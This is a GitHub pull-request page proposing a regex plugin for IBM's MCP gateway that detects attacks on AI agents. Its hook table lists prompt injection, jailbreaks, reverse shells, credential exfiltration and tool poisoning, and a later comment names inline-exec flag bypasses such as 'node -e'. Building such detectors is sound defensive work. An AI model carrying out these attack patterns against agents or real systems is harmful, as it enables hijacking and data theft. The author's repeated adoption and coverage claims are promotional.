Skip to content

feat(plugins): add ATR threat detection plugin#4109

Closed
eeee2345 wants to merge 2 commits into
IBM:mainfrom
eeee2345:feat/atr-threat-detection-plugin
Closed

feat(plugins): add ATR threat detection plugin#4109
eeee2345 wants to merge 2 commits into
IBM:mainfrom
eeee2345:feat/atr-threat-detection-plugin

Conversation

@eeee2345

@eeee2345 eeee2345 commented Apr 9, 2026

Copy link
Copy Markdown

Summary

Add an ATR (Agent Threat Rules) threat detection plugin that scans MCP payloads for known AI agent attack patterns using community-maintained regex rules.

Resolves #4108

Hooks implemented

Hook Scans Example threats
prompt_pre_fetch Prompt arguments Prompt injection, jailbreak
tool_pre_invoke Tool name + args Reverse shell, code injection
tool_post_invoke Tool results Credential leaks, data exfiltration
resource_post_fetch Resource content Hidden instructions, tool poisoning

Design

  • Follows secrets_detection plugin pattern exactly
  • 20 bundled rules, 60 compiled patterns across 8 categories
  • Configurable block_on_detection and min_severity threshold
  • Pure regex, no API calls, <5ms per scan
  • Registered at priority 53 (security range), mode: "disabled" by default
  • Rules from ATR project (MIT)

Files

File Description
plugins/atr_threat_detection/atr_threat_detection.py Plugin implementation (330 lines)
plugins/atr_threat_detection/rules.json 20 ATR rules
plugins/atr_threat_detection/plugin-manifest.yaml Hook declarations + config
plugins/atr_threat_detection/__init__.py Module init
plugins/atr_threat_detection/README.md Usage docs
plugins/config.yaml Registration entry
tests/unit/plugins/test_atr_threat_detection.py 18 tests

Test plan

  • 18 unit tests: clean passthrough, blocked injection, block_on_detection=False, min_severity filtering, all 4 hooks, empty input handling
  • make lint / make test / make coverage
  • CI validation

Signed-off-by: eeee2345

eeee2345 added 2 commits April 9, 2026 22:58
Add regex-based AI agent threat detection using ATR community rules:
- Scans prompts, tool invocations, tool results, and resources
- 20 bundled rules covering OWASP Agentic Top 10
- Configurable blocking, severity threshold
- Pure regex, no API keys, <5ms per scan

Source: https://agentthreatrule.org (MIT)
Complements existing security plugins (secrets_detection, encoded_exfil_detection)

Signed-off-by: Panguard AI <support@panguard.ai>
- Add test_atr_threat_detection.py with tests for all 4 hooks
- Fix tool_pre_invoke to use payload.args directly
- Add Authors field to file header
- Extract reverse severity dict to module constant _SEVERITY_NAMES

Signed-off-by: Panguard AI <support@panguard.ai>
@eeee2345

Copy link
Copy Markdown
Author

@crivetimihai @madhav165 — friendly bump on this one. Following the secrets_detection plugin template exactly, disabled-by-default, priority 53, 18 tests, no source changes outside the plugin directory.

This week's mcp-atlassian disclosures (CVE-2026-27825 / CVE-2026-27826, Pluto Security re-surfaced as "MCPwnfluence") made the regex-based MCP threat-detection case a bit more concrete, if that helps prioritize triage. The underlying ATR ruleset also now covers 97.1% of NVIDIA garak's 666 real-world jailbreaks, which gives the plugin's recall some external grounding.

Happy to split, narrow scope, or drop any piece — just let me know what shape is preferred.

@eeee2345

eeee2345 commented May 2, 2026

Copy link
Copy Markdown
Author

@crivetimihai @kevalmahajan @madhav165 — gentle bump on this PR (no urgency, just keeping it visible).

Since the last comment (4/21), the underlying ATR ruleset has shipped two more major integrations: Cisco AI Defense merged the full 314-rule pack (#99, 4/22) and Microsoft Agent Governance Toolkit followed (#1277, 4/26, with a weekly auto-sync workflow).

The plugin in this PR remains unchanged from the 4/21 submission — 18 tests, follows the secrets_detection template exactly, disabled-by-default. If there's anything I can split, narrow, or adjust to match mcp-context-forge plugin standards, please let me know.

Thanks for the time.

@eeee2345

eeee2345 commented May 5, 2026

Copy link
Copy Markdown
Author
  • ATR-2026-00415 — Flowise Custom MCP node CVE-2026-40933 (CVSS 9.9), the inline-exec flag bypass (npx -c, node -e, python -c)
  • ATR-2026-00416 — LiteLLM-class unauthenticated MCP registration CVE-2026-30623, where the registration surface itself is the attack channel
  • ATR-2026-00419 — Cursor / Windsurf / Claude Code / Gemini CLI / Copilot zero-click MCP config (CVE-2025-54136 + OX batch)

The plugin in this PR is unchanged from the 2026-04-21 submission — same secrets_detection template, disabled-by-default, priority 53, 18 tests. The new rules ship via the upstream agent-threat-rules npm package, so once the plugin lands, mcp-context-forge users automatically receive the v2.0.18 detection bundle through a normal pnpm update.

Two ecosystem signals worth flagging since the original PR:

If anything in the plugin needs reshaping to match mcp-context-forge plugin standards (file layout, priority number, detection-tier integration, test framework), I am happy to take that pass — please drop the specifics in a review comment and I will turn it around in a day.

If the right shape is "split this PR into two" (one for the plugin scaffold, one for the rules-bundle hookup) I am also happy to do that.

Thanks for the time.

@eeee2345

eeee2345 commented May 9, 2026

Copy link
Copy Markdown
Author

@crivetimihai @kevalmahajan @madhav165 — quick FYI, not another bump.

ATR shipped v2.1.0 today (agent-threat-rules@2.1.0 on npm) with 100% NIST AI RMF coverage — 330 rules mapped to all 16 RMF subcategories, 1,566 mappings total. For IBM Power11 / federal / regulated MCP deployments, this means each detection now carries an audit-ready RMF GOVERN/MAP/MEASURE/MANAGE tag, which downstream compliance tooling can consume directly.

If this PR lands as-is, bumping the dep to ^2.1.0 before merge would surface the RMF metadata to mcp-context-forge users for free (no plugin code change required).

Mapping reference: https://agentthreatrule.org/en/compliance/nist-ai-rmf

Happy to open a one-line dep bump as a separate PR if that's cleaner.

@eeee2345

Copy link
Copy Markdown
Author

@crivetimihai @kevalmahajan @madhav165 — two updates since the 5/9 FYI.

  1. ATR was accepted into MISP taxonomies on 2026-05-10 (Add agent-threat-rules taxonomy MISP/misp-taxonomies#323) — the threat-intel sharing layer used by global CERTs and ISACs. Relevant for mcp-context-forge enterprise consumers routing threat findings into MISP-compatible CSIRT or SIEM pipelines: ATR rule IDs now resolve as standard machine tags downstream.

  2. v2.1.1 shipped 2026-05-10 with 6 new rules covering 7 critical CVEs (CVSS 9.1–10.0). Two are directly in mcp-context-forge's territory: ATR-2026-00434 covers mcp-remote OS command injection (CVE-2025-6514, 437K weekly npm downloads), and ATR-2026-00435 covers Azure MCP Server missing auth on production endpoints (CVE-2026-32211). The ATR plugin in feat(plugins): add ATR threat detection plugin #4109 picks both up automatically on rules.json sync once merged.

Still available for any open review items.

@eeee2345

Copy link
Copy Markdown
Author

@crivetimihai @kevalmahajan @madhav165 — quick update on ATR's standardisation footprint since the 5/9 FYI.

ATR landed in MISP at two layers on 2026-05-10, both merged by adulau (MISP project lead):

Relevant for mcp-context-forge enterprise consumers: threat findings emitted from the ATR plugin in #4109 will carry full MISP cluster context downstream when routed into any MISP-compatible CSIRT or SIEM pipeline — no translation layer, no custom enrichment. The galaxy half is the substantive one; it's the cluster shape CSIRTs use for incident triage.

Still available for any open review items on #4109.

@eeee2345

Copy link
Copy Markdown
Author

@jonpspri — sorry for the noise. This PR has been waiting on
CODEOWNERS routing since 4/9; I think it slipped because plugins/
at root isn't in .github/CODEOWNERS (only /mcpgateway/plugins is).
The plugin mirrors the secrets_detection template you merged in
#4250 — same layout, 18 tests, disabled-by-default, priority 53.
DCO green, no source changes outside the plugin dir. Happy to make
any changes you want, or split scope if that helps.

@eeee2345

Copy link
Copy Markdown
Author

Closing this for now to keep your queue clean — it hasn't picked up a review slot. The ATR integration is ready whenever it's useful; glad to reopen or split into a smaller diff if you'd like to revisit. Thanks!

@eeee2345 eeee2345 closed this Jun 13, 2026
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

feat(plugins): Regex-based agent threat detection plugin (ATR)

2 participants